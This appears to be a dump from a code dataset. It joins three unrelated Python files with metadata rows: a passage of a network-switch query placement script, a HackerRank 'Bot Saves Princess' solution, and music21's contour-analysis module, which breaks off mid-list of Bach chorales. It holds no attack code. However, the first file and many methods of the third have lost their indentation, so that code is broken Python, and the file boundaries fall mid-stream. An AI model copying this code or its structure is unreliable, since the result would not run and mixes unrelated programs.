        self.query_id, self.src_id, self.dst_id = query_id, src_id, dst_id
# initialize switch preference weight
def init_env():
    """Return the initial state for 20 switches: a zeroed weight list and
    one independent empty load list per switch."""
    total_switch_size = 20
    switch_weights = [0 for _ in range(total_switch_size)]
    switch_loads = [[] for _ in range(total_switch_size)]
    return switch_weights, switch_loads
if __name__ == "__main__":
parser = ArgumentParser()
parser.add_argument("-q", "--query", help="Query input file location", dest="query_location", default="./data/queries.json")
args = parser.parse_args()
logging.basicConfig(level=logging.INFO)
switch_weights, switch_loads = init_env()
with open(args.query_location, 'r') as inputQueries:
unparsed_queries = inputQueries.read()
queries = json.loads(unparsed_queries)
for query in queries:
edge_sw1, edge_sw2 = Seeker.find_edge_switch_on_path(
switch_id1=query['src_host_id'],
switch_id2=query['dst_host_id'],
pod_scale=4)
aggr_sw1, aggr_sw2 = Seeker.find_aggr_switch_on_path(
edge_id1=edge_sw1,
edge_id2=edge_sw2,
pod_scale=4)
core_sws = Seeker.find_core_switch_on_path(pod_scale=4)
edge_weight_1 = switch_weights[edge_sw1]
edge_weight_2 = switch_weights[edge_sw2]
aggr_weight_1, aggr_weight_2, core_weight = 0, 0, 0
hybrid_weight_1, hybrid_weight_2, hybrid_weight_3, hybrid_weight_4 = 0, 0, 0, 0
for aggr_sw in aggr_sw1:
aggr_weight_1 += switch_weights[aggr_sw]
for aggr_sw in aggr_sw2:
aggr_weight_2 += switch_weights[aggr_sw]
for core_sw in core_sws:
core_weight += switch_weights[core_sw]
hybrid_sw1 = [aggr_sw1[0], core_sws[0], core_sws[1]]
hybrid_sw2 = [aggr_sw1[1], core_sws[2], core_sws[3]]
hybrid_sw3 = [aggr_sw2[0], core_sws[0], core_sws[1]]
hybrid_sw4 = [aggr_sw2[1], core_sws[2], core_sws[3]]
for sw_id in hybrid_sw1:
hybrid_weight_1 += switch_weights[sw_id]
for sw_id in hybrid_sw2:
hybrid_weight_2 += switch_weights[sw_id]
for sw_id in hybrid_sw3:
hybrid_weight_3 += switch_weights[sw_id]
for sw_id in hybrid_sw4:
hybrid_weight_4 += switch_weights[sw_id]
chosen_pos = Judge.find_lowest_cost_node(
[edge_weight_1, edge_weight_2, aggr_weight_1, aggr_weight_2, core_weight,
hybrid_weight_1, hybrid_weight_2, hybrid_weight_3, hybrid_weight_4],
[edge_sw1, edge_sw2, aggr_sw1, aggr_sw2, core_sws, hybrid_sw1, hybrid_sw2,
hybrid_sw3, hybrid_sw4])
Updater.update_weight(weights=switch_weights, pos=chosen_pos)
installed_query = installed_query_info(query_id=query['query_id'],
src_id=query['src_host_id'], dst_id=query['dst_host_id'])
if isinstance(chosen_pos, list):
for pos in chosen_pos:
switch_loads[pos].append(installed_query)
elif isinstance(chosen_pos, int):
switch_loads[chosen_pos].append(installed_query)
# print results
print("####### Control Plane Placement Results #######")
for index, loads in enumerate(switch_loads):
if len(loads) > 0:
print("Switch %d got %d tasks" % (index, len(loads)))
'''
for load in loads:
if isinstance(load, installed_query_info):
print("Switch %d install query no.%d, from host %d to host %d" %
(index, load.query_id, load.src_id, load.dst_id))
'''
| In-Net/NQATP | stimulator/easy_seeker.py | easy_seeker.py | py | 3,891 | python | en | code | 0 | github-code | 36 |
8458106104 | """Princess Peach is trapped in one of the four corners of a square grid. You are in the center of the grid and can move
one step at a time in any of the four directions. Can you rescue the princess?
Input format
The first line contains an odd integer N (3 <= N < 100) denoting the size of the grid. This is followed by an NxN grid.
Each cell is denoted by '-' (ascii value: 45). The bot position is denoted by 'm' and the princess position is denoted by 'p'.
Grid is indexed using Matrix Convention
Output format
Print out the moves you will take to rescue the princess in one go. The moves must be separated by '\n', a newline.
The valid moves are LEFT or RIGHT or UP or DOWN.
Sample input
>>> 3
>>> ---
>>> -m-
>>> p--
Sample output
DOWN
LEFT
Task
Complete the function displayPathtoPrincess which takes in two parameters - the integer N and the character array grid.
The grid will be formatted exactly as you see it in the input, so for the sample input the princess is at grid[2][0].
The function shall output moves (LEFT, RIGHT, UP or DOWN) on consecutive lines to rescue/reach the princess. The goal
is to reach the princess in as few moves as possible.
The above sample input is just to help you understand the format. The princess ('p') can be in any one of the four corners.
Scoring
Your score is calculated as follows : (NxN - number of moves made to rescue the princess)/10, where N is the size of
the grid (3x3 in the sample testcase).
Solved score: 13.90pts
Submissions: 80065
Max Score: 13
Difficulty: Easy
Rate This Challenge:
More
"""
def displayPathtoPrincess(n, grid):
    """Return the shortest move sequence (one of UP/DOWN/LEFT/RIGHT per
    line, each newline-terminated) taking the bot 'm' to the princess 'p'
    on an n x n grid. Vertical moves are emitted before horizontal ones.
    """
    # Locate both markers on the grid.
    for row in range(n):
        for col in range(n):
            if grid[row][col] == 'm':
                bot_row, bot_col = row, col
            elif grid[row][col] == 'p':
                princess_row, princess_col = row, col
    row_diff = princess_row - bot_row
    col_diff = princess_col - bot_col
    moves = []
    if row_diff > 0:
        moves.extend(['DOWN'] * row_diff)
    elif row_diff < 0:
        moves.extend(['UP'] * -row_diff)
    if col_diff > 0:
        moves.extend(['RIGHT'] * col_diff)
    elif col_diff < 0:
        moves.extend(['LEFT'] * -col_diff)
    return ''.join(move + '\n' for move in moves)
if __name__ == '__main__':
    print('Welcome to the Bot Save Princess Challenge!')
    print('Test mode? (y/n): ')
    test_mode = input()
    if test_mode == 'y':
        # Built-in regression case: bot at (1, 2), princess at (3, 0).
        test_cases = [
            {
                'grid_size': 4,
                'grid': [
                    '----',
                    '--m-',
                    '----',
                    'p---'
                ],
                'expected_output': 'DOWN\nDOWN\nLEFT\nLEFT\n'
            },
        ]
        answer = displayPathtoPrincess(test_cases[0]['grid_size'], test_cases[0]['grid'])
        print('Answer: ', answer)
        print('Expected answer: ', test_cases[0]['expected_output'])
        if answer == test_cases[0]['expected_output']:
            print('Test case 1 passed!')
        assert answer == test_cases[0]['expected_output']
    else:
        # Interactive mode: read an N x N grid, one row per line.
        print("Enter the grid size: ")
        grid_size = int(input())
        print("Enter the grid: ")
        grid = []
        for i in range(grid_size):
            grid.append(input().strip())
        print(grid)
        # Bug fix: the computed move sequence was discarded; print it so the
        # user actually sees the rescue path.
        print(displayPathtoPrincess(grid_size, grid))
6128705889 | import random
import unittest
from music21 import base # for _missingImport testing.
from music21 import repeat
from music21 import exceptions21
from music21 import corpus
from music21 import environment
_MOD = 'contour.py'
environLocal = environment.Environment(_MOD)
#---------------------------------------------------
class ContourException(exceptions21.Music21Exception):
    """Raised when contour analysis cannot proceed, e.g. when matplotlib or
    numpy is unavailable (see _getExtendedModules)."""
    pass
class OverwriteException(exceptions21.Music21Exception):
    """Presumably raised to guard against overwriting stored contour data;
    no raise site appears in this part of the module -- confirm usage."""
    pass
def _getExtendedModules():
    '''
    Import and return the optional plotting dependencies.

    This is done inside a def, so that the slow import of matplotlib is not done
    in ``from music21 import *`` unless it's actually needed.

    Returns a tuple ``(plt, numpy)``.

    Raises ContourException if matplotlib or numpy is listed in
    ``base._missingImport`` (i.e. failed to import at music21 startup).
    '''
    if 'matplotlib' in base._missingImport:
        raise ContourException(
            'could not find matplotlib, contour mapping is not allowed (numpy is also required)')
    if 'numpy' in base._missingImport:
        raise ContourException('could not find numpy, contour mapping is not allowed')
    import matplotlib.pyplot as plt
    import numpy
    return (plt, numpy)
class ContourFinder:
'''
ContourFinder is a class for finding 2-dimensional contours
of a piece based on different metrics.
Predefined metrics are 'dissonance', 'tonality', and 'spacing'.
To get a contour, use ContourFinder(myStream).getContour('dissonance'), for example.
If you wish to create your own metric for giving a numerical score to a stream, you can call
ContourFinder(myStream).getContour('myMetricName', metric=myMetric)
ContourFinder looks at a moving window of m measures, and moves that window by
n measures each time.
M and n are specified by 'window' and 'slide', which are both 1 by default.
>>> s = corpus.parse('bwv29.8')
>>> ContourFinder(s).plot('tonality')
TODO: image here...
'''
    def __init__(self, s=None):
        '''
        Wrap a music21 stream (typically a Score) for contour analysis.
        All expensive derived data (chordified stream, key, contours) is
        computed lazily and cached on the instance.
        '''
        self.s = s # a stream.Score object
        self.sChords = None #lazy evaluation: chordified copy of self.s, built on demand
        self.key = None  # analyzed key of self.s; set lazily or via setKey()
        self._contours = { } #A dictionary mapping a contour type to a normalized contour dictionary
        #self._metrics maps the name of a metric to a tuple (x,y)
        #    where x=metric function and y=needsChordify
        self._metrics = {"dissonance": (self.dissonanceMetric, True),
                         "spacing": (self.spacingMetric, True),
                         "tonality": (self.tonalDistanceMetric, False) }
        # marker attribute so AggregateContour can duck-type-check for a ContourFinder
        self.isContourFinder = True
    def setKey(self, key):
        '''
        Sets the key of ContourFinder's internal stream.  If not set manually, self.key will
        be determined lazily by ``self.s.analyze('key')`` the first time a
        key-dependent metric (tonalDistanceMetric) runs.
        '''
        self.key = key
    def getContourValuesForMetric(self, metric, window=1, slide=1, needChordified=False):
        '''
        Returns a dictionary mapping measure numbers to that measure's score under
        the provided metric.
        Ignores pickup measures entirely.

        Window is a positive integer indicating how many measures the metric should
        look at at once, and slide is
        a positive integer indicating by how many measures the window should slide
        over each time the metric is measured.

        e.g. if window=4 and slide=2, metric = f, the result will be of the form:
        { measures 1-4: f(measures 1-4),
        measures 3-6: f(measures 3-6),
        measures 5-8: f( measures5-8), ...}

        >>> metric = lambda s: len(s.measureOffsetMap())
        >>> c = corpus.parse('bwv10.7')
        >>> res = ContourFinder(c).getContourValuesForMetric(metric, 3, 2, False)
        >>> resList = sorted(list(res.keys()))
        >>> resList
        [1, 3, 5, 7, 9, 11, 13, 15, 17, 19, 21]
        >>> [res[x] for x in resList]
        [3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2]

        OMIT_FROM_DOCS
        >>> #set([1, 3, 5, 7, 9, 11, 13, 15, 17, 19, 21]).issubset(set(res.keys()))
        '''
        res = {}
        if needChordified:
            # chordify once and cache; several metrics need a chord-only stream
            if self.sChords is None:
                self.sChords = self.s.chordify()
            s = self.sChords
        else:
            s = self.s
        mOffsets = s.measureOffsetMap()
        # hasPickup is a bool used arithmetically (True == 1) to drop the pickup
        hasPickup = repeat.RepeatFinder(s).hasPickup()
        numMeasures = len(mOffsets) - hasPickup
        # slide the window across the piece; the final window may extend past
        # the last measure (s.measures clips it)
        for i in range(1, numMeasures + 1, slide): #or numMeasures-window + 1
            fragment = s.measures(i, i + window - 1)
            #TODO: maybe check that i+window-1 is less than numMeasures + window / 2
            resValue = metric(fragment)
            res[i] = resValue
        return res
#TODO: tests that use simple 4-bar pieces that we have to create...
#ALSO: Need pictures or something! Need a clear demonstration!
    def getContour(self, cType, window=None, slide=None, overwrite=False,
                   metric=None, needsChordify=False, normalized=False):
        '''
        Stores and then returns a contour of the type cType.
        cType can be either 'spacing', 'tonality', or 'dissonance'.

        If using a metric that is not predefined, cType is any string that
        signifies what your metric measures.
        In this case, you must pass getContour a metric function which takes
        in a music21 stream and outputs a score.
        If passing a metric that requires the music21 stream be just chords,
        specify needsChordify=True.

        Window is how many measures are considered at a time and slide is the
        number of measures the window moves
        over each time.  By default, window and slide are both 1.

        Each time you call getContour for a cType, the result is cached.
        If you wish to get the contour
        for the same cType more than once, with different parameters
        (with a different window and slide, for example)
        then specify overwrite=True

        To get a contour where measures map to the metric values,
        use normalized=False (the default), but to get a contour
        which evenly divides time between 1.0 and 100.0, use normalized=True

        >>> cf = ContourFinder( corpus.parse('bwv10.7'))
        >>> mycontour = cf.getContour('dissonance')
        >>> [mycontour[x] for x in sorted(mycontour.keys())]
        [0.0, 0.25, 0.5, 0.5, 0.0, 0.0, 0.25, 0.75, 0.0, 0.0, 0.5, 0.75, 0.75,
         0.0, 0.5, 0.5, 0.5, 0.5, 0.75, 0.75, 0.75, 0.0]

        >>> mycontour = cf.getContour('always one', 2, 2, metric= lambda x: 1.0)
        >>> [mycontour[x] for x in sorted(mycontour.keys())]
        [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0]

        >>> mycontour = cf.getContour('spacing', metric = lambda x: 2, overwrite=False)
        Traceback (most recent call last):
        OverwriteException: Attempted to overwrite 'spacing' metric but did
        not specify overwrite=True

        >>> mycontour = cf.getContour('spacing', slide=3, metric = lambda x: 2.0, overwrite=True)
        >>> [mycontour[x] for x in sorted(mycontour.keys())]
        [2.0, 2.0, 2.0, 2.0, 2.0, 2.0, 2.0, 2.0]

        >>> mycontour = cf.getContour('spacing')
        >>> [mycontour[x] for x in sorted(mycontour.keys())]
        [2.0, 2.0, 2.0, 2.0, 2.0, 2.0, 2.0, 2.0]
        '''
        if overwrite is False:
            # cached-result path: reuse unless the caller asks for new params
            if cType in self._contours:
                if window is not None or slide is not None:
                    raise OverwriteException(
                        "Attempted to overwrite cached contour of type {0}".format(cType) +
                        " but did not specify overwrite=True")
                else:
                    return self._contours[cType]
            elif cType in self._metrics:
                # a metric is already registered for this cType; a new metric
                # function may not silently replace it
                if metric is not None:
                    raise OverwriteException("Attempted to overwrite '{0}' ".format(cType) +
                                             "metric but did not specify overwrite=True")
                else:
                    metric, needsChordify = self._metrics[cType]
            else:
                # first use of a user-defined cType: register its metric
                self._metrics[cType] = (metric, needsChordify)
        else:
            # overwrite=True: fall back to the registered metric if none given
            if metric is None:
                if cType in self._metrics:
                    metric, needsChordify = self._metrics[cType]
                else:
                    raise ContourException("Must provide your own metric for type: %s" % cType)
        # None means "use the default of 1"; distinguishes "unspecified" from an
        # explicit value in the overwrite checks above
        if slide is None:
            slide = 1
        if window is None:
            window = 1
        contour = self.getContourValuesForMetric(metric, window, slide, needsChordify)
        if normalized:
            contour = self._normalizeContour(contour, 100.0)
        self._contours[cType] = contour
        return contour
def _normalizeContour(self, contourDict, maxKey):
'''
Normalize a contour dictionary so that the values of the keys range from 0.0 to length.
>>> mycontour = { 0.0: 1.0, 3.0: 0.5, 6.0: 0.8, 9.0: 0.3, 12.0: 0.15,
... 15.0: 0.13, 18.0: 0.4, 21.0: 0.6 }
>>> res = ContourFinder()._normalizeContour(mycontour, 100)
>>> resKeys = list(res.keys())
>>> resKeys.sort()
>>> contourKeys = list(mycontour.keys())
>>> contourKeys.sort()
>>> len(contourKeys) == len(resKeys)
True
>>> x = True
>>> for i in range(len(contourKeys)):
... if mycontour[contourKeys[i]] != res[resKeys[i]]:
... x = False
>>> x
True
>>> 100.0 in res
True
>>> 0.0 in res
True
'''
myKeys = list(contourDict.keys())
myKeys.sort()
numKeys = len(myKeys)
spacing = (maxKey)/(numKeys-1.0)
res = {}
i = 0.0
for j in myKeys:
res[round(i, 3)] = round(float(contourDict[j]), 5)
i += spacing
return res
#TODO: give same args as getContour, maybe? Also, test this.
    def plot(self, cType, contourIn=None, regression=True, order=4,
             title='Contour Plot', fileName=None):
        '''
        Plot the contour of type cType as a scatter of (time, value) points,
        optionally overlaid with a polynomial regression of the given order.
        If contourIn is None the contour is computed (or fetched from cache).
        When fileName is given the figure is saved as fileName + '.png';
        otherwise it is shown interactively.  The figure is cleared afterwards.
        '''
        (plt, numpy) = _getExtendedModules()

        if contourIn is None:
            if cType not in self._contours:
                contourIn = self.getContour(cType)
            else:
                contourIn = self._contours[cType]

        x = list(contourIn.keys())
        x.sort()
        y = [contourIn[i] for i in x]

        plt.plot(x, y, '.', label='contour', markersize=5)
        if regression:
            # least-squares polynomial fit evaluated on an evenly spaced grid
            p = numpy.poly1d(numpy.polyfit(x, y, order))
            t = numpy.linspace(0, x[-1], x[-1] + 1)
            plt.plot(t, p(t), 'o-', label='estimate', markersize=1) #probably change label

        plt.xlabel('Time (arbitrary units)')
        plt.ylabel('Value for %s metric' % cType)
        plt.title(title) #say for which piece

        if fileName is not None:
            plt.savefig(fileName + '.png')
        else:
            plt.show()
        plt.clf()
def randomize(self, contourDict):
'''
Returns a version of contourDict where the keys-to-values mapping is scrambled.
>>> myDict = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8, 9:9, 10:10, 11:11, 12:12, 13:13,
... 14:14, 15:15, 16:16, 17:17, 18:18, 19:19, 20:20}
>>> res = ContourFinder().randomize(myDict)
>>> res == myDict
False
>>> sorted(list(res.keys())) == sorted(list(myDict.keys()))
True
>>> sorted(list(res.values())) == sorted(list(myDict.values()))
True
'''
res = {}
myKeys = list(contourDict.keys())
myValues = list(contourDict.values())
random.shuffle(myKeys)
for i in range(len(myKeys)):
res[myKeys[i]] = myValues[i]
return res
#--- code for the metrics
    def _calcGenericMetric(self, inpStream, chordMetric):
        '''
        Helper function which, given a metric value for a chord, calculates a metric
        for a series of measures by taking the sum of each chord's metric value weighted by
        its duration, divided by the total chord duration.

        Returns None when inpStream contains no chords (total duration 0).
        '''
        score = 0
        n=0  # running total of chord durations (the weight denominator)

        for measure in inpStream:
            if 'Measure' in measure.classes:
                for chord in measure:
                    if 'Chord' in chord.classes:
                        dur = chord.duration.quarterLength
                        # weight each chord's score by how long it sounds
                        score += chordMetric(chord)*dur
                        n += dur

        if n != 0:
            return score / n
        else:
            return None
    def dissonanceMetric(self, inpStream):
        '''
        inpStream is a stream containing some number of measures which each contain chords.
        Output is a number between 0 and 1 which is proportional to the number of dissonant chords
        (duration-weighted fraction of non-consonant chords).

        To work correctly, input must contain measures and no parts.

        >>> c = corpus.parse('bwv102.7').chordify()
        >>> ContourFinder().dissonanceMetric( c.measures(1, 1) )
        0.25
        >>> ContourFinder().dissonanceMetric( c.measures(8, 8) )
        0.5
        >>> ContourFinder().dissonanceMetric( c.measures(1, 10)) < 1.0
        True
        '''
        # 1 - isConsonant(): True (consonant) scores 0, False (dissonant) scores 1
        return self._calcGenericMetric(inpStream, lambda x: 1-x.isConsonant() )
    def spacingMetric(self, inpStream):
        '''
        Defines a metric which takes a music21 stream containing measures and no parts.
        This metric measures how spaced out notes in a piece are: adjacent-pitch
        gaps within each chord are raised to fractional powers and summed,
        then duration-weighted across the stream by _calcGenericMetric.
        '''

        #TODO: FIGURE OUT IF THIS IS REASONABLE!  MIGHT WANT TO JUST DO: sqrt( sum(dist^2) )
        def spacingForChord(chord):
            # score one chord from the gaps between its sorted pitch-space values
            pitches = [ x.ps for x in chord.pitches ]
            pitches.sort()
            res = 0
            if len(pitches) <= 1:
                return 0
            elif len(pitches) == 2:
                return (pitches[1] - pitches[0])
            else:
                # bottom gap is damped (** 0.7); upper gaps are amplified (** 1.5)
                res += (pitches[1] - pitches[0]) ** (0.7)
                for i in range(1, len(pitches)-1):
                    res += (pitches[i + 1]-pitches[i]) ** (1.5)
                return res

        return self._calcGenericMetric(inpStream, spacingForChord)
    def tonalDistanceMetric(self, inpStream):
        '''
        Returns a number between 0.0 and 1.0 that is a measure of how far away the key of
        inpStream is from the key of ContourFinder's internal stream.

        NOTE(review): if the overall key appears in neither the best guess nor its
        alternate interpretations, certainty stays at the sentinel -2 and the
        return value is 1.5, outside the documented 0.0-1.0 range -- confirm
        whether that can happen with music21's key analysis.
        '''
        if self.key is None:
            # lazily analyze and cache the key of the whole piece
            self.key = self.s.analyze('key')

        guessedKey = inpStream.analyze('key')
        certainty = -2 #sentinel; should be replaced by a value between -1 and 1

        if guessedKey == self.key:
            certainty = guessedKey.correlationCoefficient
        else:
            # look for the overall key among the fragment's alternate readings
            for pkey in guessedKey.alternateInterpretations:
                if pkey == self.key:
                    certainty = pkey.correlationCoefficient
                    break

        # map correlation [-1, 1] to distance [1, 0]
        return (1 - certainty) / 2.0
class AggregateContour:
'''
An AggragateContour object is an object that stores and consolidates
contour information for a large group
of pieces.
To add a piece to the aggregate contour, use
AggregateContour.addPieceToContour(piece, cType), where cType is
the type of contour (the default possibilities are
'tonality', 'spacing', and 'dissonance'), and piece is either
a parsed music21 stream or a ContourFinder object.
To get the combined contour as list of ordered pairs, use
AggragateContour.getCombinedContour(), and to
get the combined contour as a polynomial approximation, use
AggragateContour.getCombinedContourPoly().
You can plot contours with AggragateContour.plotAggragateContour(cType).
To compare a normalized contour to the aggragate, use
AggragateContour.dissimilarityScore(cType, contour).
'''
def __init__(self, aggContours=None):
if aggContours is None:
self.aggContours = {}
# = {'spacing': [ {1:2, 2:3}, {...}, ...], 'tonality': [...], ... }
else:
self.aggContours = aggContours
self._aggContoursAsList = {}
self._aggContoursPoly = {}
    def addPieceToContour(self, piece, cType, metric=None, window=1,
                          slide=1, order=8, needsChordify=False):
        '''
        Adds a piece to the aggregate contour.

        piece is either a music21 stream, or a ContourFinder object (which
        should have a stream wrapped inside of it).
        cType is the contour type.

        If using a metric that is not predefined, cType is any string
        that signifies what your metric measures.
        In this case, you must pass getContour a metric function
        which takes in a music21 stream and outputs a score.
        If passing a metric that requires the music21 stream be
        just chords, specify needsChordify=True.

        Window is how many measures are considered at a time and
        slide is the number of measures the window moves
        over each time.  By default, window and slide are both 1.
        '''
        # duck-type check: wrap plain streams in a ContourFinder
        if hasattr(piece, 'isContourFinder') and piece.isContourFinder:
            pass
        else:
            piece = ContourFinder(piece)

        # normalized=True so every piece's contour spans the same 0-100 range
        contour = piece.getContour(cType, window=window, slide=slide,
                                   overwrite=False, metric=metric,
                                   needsChordify=needsChordify, normalized=True)

        if cType not in self.aggContours:
            self.aggContours[cType] = []
        self.aggContours[cType].append(contour)

        return
def getCombinedContour(self, cType): #, metric=None, window=1, slide=1, order=8):
'''
Returns the combined contour of the type specified by cType. Instead of a dictionary,
this contour is just a list of ordered pairs (tuples) with the
first value being time and the
second value being the score.
'''
if cType in self._aggContoursAsList:
return self._aggContoursAsList[cType]
elif cType in self.aggContours:
contour = self.aggContours[cType]
res = []
for contDict in contour:
res.extend( [ (x, contDict[x]) for x in contDict] )
self._aggContoursAsList[cType] = res
return res
else:
return None
    def getCombinedContourPoly(self, cType, order=8):
        '''
        Returns the polynomial fit for the aggregate contour of type cType,
        as a numpy.poly1d, or None if no contour of that type exists.

        Order is the order of the resulting polynomial.  e.g. For a linear regression, order=1.
        NOTE(review): the fit is cached under cType alone, so a later call with a
        different order returns the first fit -- confirm this is intended.
        '''
        (unused_plt, numpy) = _getExtendedModules()
        if cType in self._aggContoursPoly:
            return self._aggContoursPoly[cType]
        elif cType in self._aggContoursAsList:
            contList = self._aggContoursAsList[cType]
        elif cType in self.aggContours:
            contList = self.getCombinedContour(cType)
        else:
            return None

        # unzip the (time, score) pairs into parallel sequences for polyfit
        x, y = zip(*contList)
        self._aggContoursPoly[cType] = numpy.poly1d( numpy.polyfit(x, y, order))
        return self._aggContoursPoly[cType]
    def plot(self, cType, showPoints=True, comparisonContour=None, regression=True, order=6):
        '''
        Plot the aggregate contour of type cType: optionally the raw points,
        an optional comparison contour (a {time: value} dict), and the cached
        polynomial regression.  Returns None if no contour of that type exists.
        NOTE(review): the ``order`` parameter is currently unused; the fit comes
        from getCombinedContourPoly's default order.
        '''
        #TODO: maybe have an option of specifying a different
        #    color thing for each individual contour...
        if cType not in self.aggContours: #['dissonance', 'tonality', 'distance']:
            return None
        else:
            contour = self.getCombinedContour(cType)
#         elif cType not in self._aggContoursAsList:
#             contour = self.getCombinedContour(cType)
#         else:
#             contour = self._aggContoursAsList[cType]
#
        (plt, numpy) = _getExtendedModules() #@UnusedVariable

        x, y = zip(*contour)
        if showPoints:
            plt.plot(x, y, '.', label='contour', markersize=5)

        if comparisonContour is not None:
            x = comparisonContour.keys()
            y = [comparisonContour[i] for i in x]
            plt.plot(x, y, '.', label='compContour', markersize=8)

        #p = numpy.poly1d( numpy.polyfit(x, y, order))
        p = self.getCombinedContourPoly(cType)

        if regression:
            t = numpy.linspace(0, max(x), max(x) + 1)
            plt.plot(t, p(t), 'o-', label='estimate', markersize=1) #probably change label

        plt.xlabel('Time (percentage of piece)')
        plt.ylabel('Value') #change this
        plt.title('title') #say for which piece
        #plt.savefig(filename + '.png')

        plt.show()
        plt.clf()
    def dissimilarityScore(self, cType, contourDict):
        '''
        Returns a score based on how dissimilar the input contourDict is from
        the aggregate contour of type cType: the sum of absolute differences
        between each of contourDict's values and the polynomial fit evaluated
        at the corresponding key (lower = more similar).

        Requires contourDict be normalized with keys from 0.0 to 100.0
        (as produced by getContour(..., normalized=True)).
        '''
        p = self.getCombinedContourPoly(cType)
        return sum( [abs(contourDict[x] - p(x)) for x in contourDict] )
_DOC_ORDER = [ContourFinder, AggregateContour]
def _getOutliers():
    '''
    Walk the Bach chorale corpus and return a dict mapping each usable
    chorale filename to its measure count after repeats are simplified
    (pickup measures excluded).

    Chorales that do not have exactly 4 parts are skipped, as is
    'bach/bwv277' (known to contain a stray measure container).
    '''
    BCI = corpus.chorales.Iterator(returnType='filename')
    highestNum = BCI.highestNumber
    currentNum = BCI.currentNumber
    lengthDict = {}
    for chorale in BCI:
        print(currentNum)
        # '!=' (value comparison) -- the original used 'is not', which compares
        # object identity and is unreliable for ints outside CPython's small-int cache
        if currentNum != highestNum:
            currentNum = BCI.currentNumber
        # skip known-bad / wrong-shaped chorales before doing any further work
        if chorale == 'bach/bwv277':
            continue
        s = corpus.parse(chorale)
        if len(s.parts) != 4:
            continue
        rf = repeat.RepeatFinder(s)
        s = rf.simplify()
        # hasPickup() is a bool used arithmetically to exclude the pickup measure
        lengthDict[chorale] = len(s.measureOffsetMap()) - rf.hasPickup()
    return lengthDict
def _runExperiment():
#get chorale iterator, initialize ac
ac = AggregateContour()
#unresolved problem numbers: 88 (repeatFinder fails!)
goodChorales = ['bach/bwv330', 'bach/bwv245.22', 'bach/bwv431',
'bach/bwv324', 'bach/bwv384', 'bach/bwv379', 'bach/bwv365',
'bach/bwv298', 'bach/bwv351', 'bach/bwv341', 'bach/bwv421',
'bach/bwv420', 'bach/bwv331', 'bach/bwv84.5', 'bach/bwv253',
'bach/bwv434', 'bach/bwv26.6', 'bach/bwv64.2', 'bach/bwv313',
'bach/bwv314', 'bach/bwv166.6', 'bach/bwv414', 'bach/bwv264',
'bach/bwv179.6', 'bach/bwv67.7', 'bach/bwv273', 'bach/bwv373',
'bach/bwv376', 'bach/bwv375', 'bach/bwv151.5', 'bach/bwv47.5',
'bach/bwv197.10', 'bach/bwv48.3', 'bach/bwv88.7', 'bach/bwv310',
'bach/bwv244.46', 'bach/bwv153.1', 'bach/bwv69.6', 'bach/bwv333',
'bach/bwv104.6', 'bach/bwv338', 'bach/bwv155.5', 'bach/bwv345',
'bach/bwv435', 'bach/bwv323', 'bach/bwv245.3', 'bach/bwv144.3', 'bach/bwv405',
'bach/bwv406', 'bach/bwv316', 'bach/bwv258', 'bach/bwv254',
'bach/bwv256', 'bach/bwv257', 'bach/bwv69.6-a', 'bach/bwv86.6',
'bach/bwv388', 'bach/bwv308', 'bach/bwv307', 'bach/bwv244.32',
'bach/bwv268', 'bach/bwv260', 'bach/bwv110.7', 'bach/bwv40.3',
'bach/bwv164.6', 'bach/bwv9.7', 'bach/bwv114.7', 'bach/bwv364',
'bach/bwv291', 'bach/bwv245.17', 'bach/bwv297', 'bach/bwv20.11',
'bach/bwv319', 'bach/bwv244.3', 'bach/bwv248.35-3', 'bach/bwv96.6',
'bach/bwv48.7', 'bach/bwv337', 'bach/bwv334', 'bach/bwv101.7',
'bach/bwv168.6', 'bach/bwv55.5', 'bach/bwv154.3', 'bach/bwv89.6',
'bach/bwv2.6', 'bach/bwv392', 'bach/bwv395', 'bach/bwv401', 'bach/bwv408',
'bach/bwv259', 'bach/bwv382', 'bach/bwv244.37', 'bach/bwv127.5',
'bach/bwv44.7', 'bach/bwv303', 'bach/bwv263', 'bach/bwv262',
'bach/bwv248.46-5', 'bach/bwv13.6', 'bach/bwv377', 'bach/bwv416',
'bach/bwv354', 'bach/bwv244.10', 'bach/bwv288', 'bach/bwv285',
'bach/bwv113.8', 'bach/bwv393', 'bach/bwv360', 'bach/bwv363',
'bach/bwv367', 'bach/bwv90.5', 'bach/bwv245.11', 'bach/bwv5.7',
'bach/bwv289', 'bach/bwv83.5', 'bach/bwv359', 'bach/bwv352',
'bach/bwv102.7', 'bach/bwv394', 'bach/bwv227.11', 'bach/bwv244.40',
'bach/bwv244.44', 'bach/bwv424', 'bach/bwv244.25', 'bach/bwv80.8',
'bach/bwv244.54', 'bach/bwv78.7', 'bach/bwv57.8', 'bach/bwv194.6',
'bach/bwv397', 'bach/bwv64.8', 'bach/bwv318', 'bach/bwv315',
'bach/bwv153.5', 'bach/bwv39.7', 'bach/bwv108.6', 'bach/bwv386',
'bach/bwv25.6', 'bach/bwv417', 'bach/bwv415', 'bach/bwv302',
'bach/bwv380', 'bach/bwv74.8', 'bach/bwv422', 'bach/bwv133.6',
'bach/bwv270', 'bach/bwv272', 'bach/bwv38.6', 'bach/bwv271', 'bach/bwv183.5',
'bach/bwv103.6', 'bach/bwv287', 'bach/bwv32.6', 'bach/bwv245.26',
'bach/bwv248.5', 'bach/bwv411', 'bach/bwv369', 'bach/bwv339',
'bach/bwv361', 'bach/bwv399', 'bach/bwv16.6', 'bach/bwv419',
'bach/bwv87.7', 'bach/bwv4.8', 'bach/bwv358', 'bach/bwv154.8',
'bach/bwv278', 'bach/bwv156.6', 'bach/bwv248.33-3', 'bach/bwv81.7',
'bach/bwv227.7', 'bach/bwv427', 'bach/bwv77.6', 'bach/bwv410',
'bach/bwv329', 'bach/bwv85.6', 'bach/bwv385', 'bach/bwv309',
'bach/bwv305', 'bach/bwv18.5-l', 'bach/bwv18.5-w', 'bach/bwv197.5',
'bach/bwv30.6', 'bach/bwv296', 'bach/bwv292', 'bach/bwv353',
'bach/bwv301', 'bach/bwv347',
'bach/bwv284', 'bach/bwv429', 'bach/bwv436', 'bach/bwv430',
'bach/bwv381', 'bach/bwv36.4-2', 'bach/bwv412', 'bach/bwv65.7', 'bach/bwv280',
'bach/bwv169.7', 'bach/bwv428', 'bach/bwv346', 'bach/bwv248.12-2',
'bach/bwv426',
'bach/bwv159.5', 'bach/bwv121.6', 'bach/bwv418', 'bach/bwv28.6',
